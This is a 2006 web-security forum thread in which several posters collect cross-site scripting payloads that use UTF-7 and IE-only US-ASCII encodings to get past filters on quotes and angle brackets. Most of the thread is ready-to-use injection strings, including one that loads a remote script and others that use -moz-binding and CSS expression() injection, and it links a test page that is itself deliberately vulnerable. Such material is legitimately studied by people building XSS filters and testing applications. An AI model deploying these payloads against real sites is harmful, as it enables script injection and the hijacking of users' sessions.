Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Bypassing Filters With Encoding
Posted by: maluc
Date: November 19, 2006 12:42AM

Thanks to RSnake for opening my eyes to alternate encoding recently, with his blog .. i was hoping to concentrate the knowledge (and questions) here..

particularly sample strings to plug in for each encoding that'll get around standard filters for ',",<,> and allow script that executes.

UTF-7
can use http://maluc.sitesled.com/utf7.html for encoding (might be worth adding to the bottom of the cheat sheet)
<script>alert(1)</script> to +ADw-script+AD4-alert(1)+ADw-/script+AD4-
"><script>alert("XSS")</script> to +ACIAPgA8-script+AD4-alert(+ACI-XSS+ACI-)+ADw-/script+AD4-
<script src=http://ha.ckers.org/s.js?> to +ADw-script src+AD0-http://ha.ckers.org/s.js+AD8APg-
" style="-moz-binding:url('http://ha.ckers.org/xssmoz.xml#xss')" to +ACI- style+AD0AIg--moz-binding:url('http://ha.ckers.org/xssmoz.xml+ACM-xss')+ACI-
";alert(1);// to +ACIAOw-alert(1)+ADs-//

i'll add other encodings as i understand them .-. .. using the same 5 sample injections. unless there is a better shortlist of injections to list

and while incomplete, this works in IE-only for US-ASCII:
<script>alert(1)</script> to ¼script¾alert(1)¼/script¾
"><script>alert("XSS")</script> to ¢¾¼script¾alert(¢XSS¢)¼/script¾
i know it's not new, just concentrating info .. more later - and feel free to contribute cause i'm very new to uncommon encoding methods ^^

-maluc

Options: ReplyQuote
Re: Bypassing Filters With Encoding
Posted by: rsnake
Date: November 19, 2006 05:03PM

This is a good list. We should definitely try to keep it up to date as new things arise.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Bypassing Filters With Encoding
Posted by: maluc
Date: November 19, 2006 09:56PM

here's a very simplistic php script i uploaded for testing different encoding methods..

i realize it's XSSable - i really don't care _-_

http://maluc.110mb.com/charsettest.php?UTF-7&+ADw-script+AD4-alert(1)+ADw-/script+AD4-x
Usage:
http://maluc.110mb.com/charsettest.php?charset&string

-maluc

Options: ReplyQuote
Re: Bypassing Filters With Encoding
Posted by: jungsonn
Date: November 20, 2006 02:09AM

Yay! nice work maluc! is this info being collected somewhere for quick reference? cause i see it scattered accross the boards.

Options: ReplyQuote
Re: Bypassing Filters With Encoding
Posted by: maluc
Date: November 20, 2006 05:16AM

yeah, it's mostly so i don't have to search everywhere for each encoding's quirks. Normally i'd throw it all into a random .txt file, but i thought others might benefit too.. it'll be a hodgepodge for now, but later i'll compile it into that first post

Continuing with US-ASCII (these are IE-only):
Alternative Quotations: ¢§ .. which are %A2,%A7 respectively.
Alternative semi-colon: » .. which is %BB
" style="xx:expresstion(alert('XSS'))" to ¢ style=¢xx:expression(alert(§XSS§))¢
";alert(1);// to ¢;alert(1);//
';alert(1);// to §;alert(1);//

à (%E0) is the equivalent for tildes, which don't seem to work in IE7

Edit: removed -moz-binding and changed to xx:expression, since its IE-only

-maluc



Edited 1 time(s). Last edit at 11/29/2006 04:18AM by maluc.

Options: ReplyQuote
Re: Bypassing Filters With Encoding
Posted by: maluc
Date: November 29, 2006 04:15AM

lol.. now why did i add a -moz-binding for US-ASCII, an IE-only encoding.. removed.

-maluc

Options: ReplyQuote
Re: Bypassing Filters With Encoding
Posted by: rsnake
Date: November 29, 2006 09:23PM

Hahah... I never would have noticed unless you said something. There are really too many moving parts to web security to keep it all on the top of your head all at the same time.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Bypassing Filters With Encoding
Posted by: jungsonn
Date: November 30, 2006 05:20AM

:D

moving parts... ^-^

Options: ReplyQuote


Sorry, only registered users may post in this forum.